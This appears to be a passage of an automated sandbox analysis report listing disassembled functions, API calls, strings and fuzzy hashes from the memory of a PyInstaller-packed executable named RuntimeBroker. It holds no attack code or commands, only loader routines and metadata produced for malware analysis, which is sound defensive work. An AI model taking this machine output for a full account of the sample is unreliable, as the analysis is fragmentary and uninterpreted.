Executed
Not Executed

Strings

PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF72B053653
Failed to start splash screen!, xrefs: 00007FF72B053933
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF72B05391A
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF72B053905
pyi-contents-directory, xrefs: 00007FF72B0535F8
pyi-disable-windowed-traceback, xrefs: 00007FF72B05361D
pkg, xrefs: 00007FF72B0537CF
pyi-runtime-tmpdir, xrefs: 00007FF72B0535D3
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF72B053A12
MEI, xrefs: 00007FF72B05374E
Failed to convert DLL search path!, xrefs: 00007FF72B0538A3
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF72B0536FC
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF72B053A31
Could not create temporary directory!, xrefs: 00007FF72B053838
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF72B0537EF
_MEIPASS2, xrefs: 00007FF72B0536A2, 00007FF72B0536AE, 00007FF72B0539AC
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF72B053820
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF72B05378C

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: efb796b3bf6ec8d0981c1c4d1efedc325a5c1d28de3f7e835e546583a0e4ecb4
Instruction ID: c6cbb027dc0dd18342b7ebaadd52c9beb44e986c02aa15b1d28176b441667dbe
Opcode Fuzzy Hash: efb796b3bf6ec8d0981c1c4d1efedc325a5c1d28de3f7e835e546583a0e4ecb4
Instruction Fuzzy Hash: 1AF16061A0868251FA3AF728DD942F9E351FF44780FC48431DA5E43AB6EF2CE554DB60

Function 00007FF72B075C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B0759A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0759E9
Part of subcall function 00007FF72B0759A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B075A67
Part of subcall function 00007FF72B0759A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B075AB8

CreateFileW.KERNELBASE ref: 00007FF72B075D7A
CreateFileW.KERNEL32 ref: 00007FF72B075DCA
GetLastError.KERNEL32 ref: 00007FF72B075DFA
GetFileType.KERNELBASE ref: 00007FF72B075E0F
GetLastError.KERNEL32 ref: 00007FF72B075E19
CloseHandle.KERNEL32 ref: 00007FF72B075E4C
CloseHandle.KERNEL32 ref: 00007FF72B075FAF
CreateFileW.KERNEL32 ref: 00007FF72B075FE4
GetLastError.KERNEL32 ref: 00007FF72B075FF3

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: 112f096b2e6b38bd1263995ab04dd34f4cd571bdbe07d92a4589d685040b76e9
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 56C1D032B28A4186EB21DF68C8906BCB761FB49B98B810225DF1E577E5CF38E451D750

Function 00007FF72B0579B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A1B
RemoveDirectoryW.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057A9E
DeleteFileW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ABD
FindNextFileW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ACB
FindClose.KERNEL32(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057ADC
RemoveDirectoryW.KERNELBASE(?,00007FF72B057EF9,00007FF72B0539E6), ref: 00007FF72B057AE5

Strings

%s\*, xrefs: 00007FF72B0579E2

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: e126fa8f0f020adca5bcc0ab7dfd6aee301a81cff63fbca390087eb470560944
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: D1417631A1C54695EE32BB28E8985B9E360FBD4754FC00631E59D42AE4DF3CE646DF10

Function 00007FF72B0585A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF72B0585D3
FindClose.KERNELBASE ref: 00007FF72B0585E2

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 680089955e522658c82d14722b38f44ac43070911214bb8180b7f320603f6d4d
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: 86F04422A1974186F771AB68B89D766B350FB44768F840235DA6D02AE4DF3CE0598F14

Function 00007FF72B06FBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 218360e3f3d10e4cbbcaada49163fe180694c255536a250390631819a036c960
Instruction ID: f6893e653b26f76ca41efc14f6db7389539a8919a3830a08b2340caf2a3770f5
Opcode Fuzzy Hash: 218360e3f3d10e4cbbcaada49163fe180694c255536a250390631819a036c960
Instruction Fuzzy Hash: A3028121F1968240FA77BB2D9C41679D680EF49BA0FC9463DDD6D467F2EE3CA4019B20

Function 00007FF72B0518F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B0576A0: _fread_nolock.LIBCMT ref: 00007FF72B05774A

_fread_nolock.LIBCMT ref: 00007FF72B0519B4

Part of subcall function 00007FF72B052760: MessageBoxW.USER32 ref: 00007FF72B05283B

Strings

MEI, xrefs: 00007FF72B051931
Error on file., xrefs: 00007FF72B051B0A
fseek, xrefs: 00007FF72B051990
fread, xrefs: 00007FF72B0519C6, 00007FF72B051ADB
Could not read full TOC!, xrefs: 00007FF72B051AD4
Failed to seek to cookie position!, xrefs: 00007FF72B051989
Could not allocate buffer for TOC!, xrefs: 00007FF72B051AA1
Failed to read cookie!, xrefs: 00007FF72B0519BF
calloc, xrefs: 00007FF72B0519F5
Could not allocate memory for archive structure!, xrefs: 00007FF72B0519EE
malloc, xrefs: 00007FF72B051AA8

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: dc0f139388d23924eab9019b476ad9a86bee98d8b1b39e258b9181f8a10baedf
Instruction ID: 776e62adcac866bfbccf858c2dc779fd04f58f663f8d478aa28dd13a46b3d767
Opcode Fuzzy Hash: dc0f139388d23924eab9019b476ad9a86bee98d8b1b39e258b9181f8a10baedf
Instruction Fuzzy Hash: D4718771A1868695FB72EB1CD8902B9E391FF48B84F844035D98D47BA5EE2CE5858F20

Function 00007FF72B0515C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72B05168E
Failed to extract %s: failed to open target file!, xrefs: 00007FF72B051617
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72B05165B
Failed to create symbolic link %s!, xrefs: 00007FF72B0515E2
fseek, xrefs: 00007FF72B051695
fread, xrefs: 00007FF72B05178C
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF72B051785
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF72B051775
fwrite, xrefs: 00007FF72B05177C
fopen, xrefs: 00007FF72B05161E
malloc, xrefs: 00007FF72B0516F6
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF72B0516EF

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: bda84ca2821aa6497a9cc9950780242a8bb7c1fb7cb635ccc5623e3dbc2a9c83
Instruction ID: ad2a28cdf61541087b99246025801a567a93735240030d93452f4a7a7366fe91
Opcode Fuzzy Hash: bda84ca2821aa6497a9cc9950780242a8bb7c1fb7cb635ccc5623e3dbc2a9c83
Instruction Fuzzy Hash: 5E518E61B0864691EA32BB1D9D901B9E3A0FF44B94FC48131DE1D47AB5EF3CE994DB20

Function 00007FF72B057FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B05800A
GetStartupInfoW.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B05802B

Part of subcall function 00007FF72B06978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0697A0

Part of subcall function 00007FF72B067A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067A93

GetCommandLineW.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B0580CD
CreateProcessW.KERNELBASE ref: 00007FF72B05810F
WaitForSingleObject.KERNEL32(?,00007FF72B0539C0), ref: 00007FF72B058123
GetExitCodeProcess.KERNELBASE ref: 00007FF72B058133

Strings

CreateProcessW, xrefs: 00007FF72B058146
Failed to create child process!, xrefs: 00007FF72B05813F

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: c404638555abeb3a581b376031f73904b500fd55e5137030cea9cb5faedec2c3
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: 97413F31A1878181DA31AB28E8952AEF391FBC9364F944739E6AD43BE5DF7CD1448F10

Function 00007FF72B0511F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF72B051256
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF72B0512C3
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF72B051295
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF72B0513EE
1.3.1, xrefs: 00007FF72B051229
malloc, xrefs: 00007FF72B05129C, 00007FF72B0512CA

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: faa7d681abe3779c1ae0691c65826196ee58a6ed43a36f27d4001866343b9dcf
Instruction ID: 816ac3cef8c3e02c27e524ba84ecdd96675152057e8b172679f087e8ff222af3
Opcode Fuzzy Hash: faa7d681abe3779c1ae0691c65826196ee58a6ed43a36f27d4001866343b9dcf
Instruction Fuzzy Hash: A451A362A0864245EA72BB19AC903BAE291FF85794F844135DE4D47FE5EF3CE941CF20

Function 00007FF72B057C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057CE4
CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF72B053834), ref: 00007FF72B057D2C

Part of subcall function 00007FF72B057E10: GetEnvironmentVariableW.KERNEL32(00007FF72B05365F), ref: 00007FF72B057E47
Part of subcall function 00007FF72B057E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF72B057E69

Part of subcall function 00007FF72B067548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B067561

Part of subcall function 00007FF72B0526C0: MessageBoxW.USER32 ref: 00007FF72B052736

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF72B057CBC
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF72B057D5E
TMP, xrefs: 00007FF72B057C7C, 00007FF72B057D83
TMP, xrefs: 00007FF72B057CA2
_MEI%d, xrefs: 00007FF72B057CF2

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction ID: 866b8e1216ac7c22f96000f58ce65c0b198d16ce94fe039142eb47ad575d0073
Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction Fuzzy Hash: D6418C61B0964244EA36FB299D912F9D291FF89780FC40135DD0D57BB6EE3CF5009B60

Function 00007FF72B06AD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06B199

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 68a47ba86f230bb5d63a3bd262fc543bc7d5861b4e9f61d57eff9af495398285
Instruction ID: c05628facd73e5f65f9d56ef1470d49cacb86d7f1aecf9c9d039b9a41bce306e
Opcode Fuzzy Hash: 68a47ba86f230bb5d63a3bd262fc543bc7d5861b4e9f61d57eff9af495398285
Instruction Fuzzy Hash: C0C1F462F0C68651E672BB1D98413BEBB90FB98B80FD90139DA5D077B1CE7CE4558B20

Function 00007FF72B057B50 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF72B057B70
OpenProcessToken.ADVAPI32 ref: 00007FF72B057B83
GetTokenInformation.KERNELBASE ref: 00007FF72B057BA8
GetLastError.KERNEL32 ref: 00007FF72B057BB2
GetTokenInformation.KERNELBASE ref: 00007FF72B057BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B057C0E
CloseHandle.KERNEL32 ref: 00007FF72B057C26

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction ID: c9caa850fbb6db86d4d85963d6896311a1b9c58241e0d985abbae8873a59b300
Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction Fuzzy Hash: 77215331A0CA4242EB31AB59A89423AE7A1FF857E4F900235DA6D43AF5DF7CE4449B10

Function 00007FF72B0533E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF72B053534), ref: 00007FF72B053411

Part of subcall function 00007FF72B0529E0: GetLastError.KERNEL32(?,?,?,00007FF72B05342E,?,00007FF72B053534), ref: 00007FF72B052A14
Part of subcall function 00007FF72B0529E0: FormatMessageW.KERNEL32(?,?,?,00007FF72B05342E), ref: 00007FF72B052A7D
Part of subcall function 00007FF72B0529E0: MessageBoxW.USER32 ref: 00007FF72B052ACF

Strings

GetModuleFileNameW, xrefs: 00007FF72B053422
\\?\, xrefs: 00007FF72B053482
Failed to convert executable path to UTF-8., xrefs: 00007FF72B0534B8
Failed to obtain executable path., xrefs: 00007FF72B05341B
Failed to resolve full path to executable %ls., xrefs: 00007FF72B053461

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: 815b5bee0a0bd1a792fd4d617f62d4ac7f45312321708e4e32c9fc018b95912e
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: A5212C61B1864691FA32BB28EC913B9D350FF49394FC04136D69E869F5EE2CF5058F20

Function 00007FF72B0581F0 Relevance: 9.1, APIs: 6, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05827A

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058364
FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B058375
FreeLibrary.KERNEL32(?,00000000,?,00007FF72B0539F2), ref: 00007FF72B05838A

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
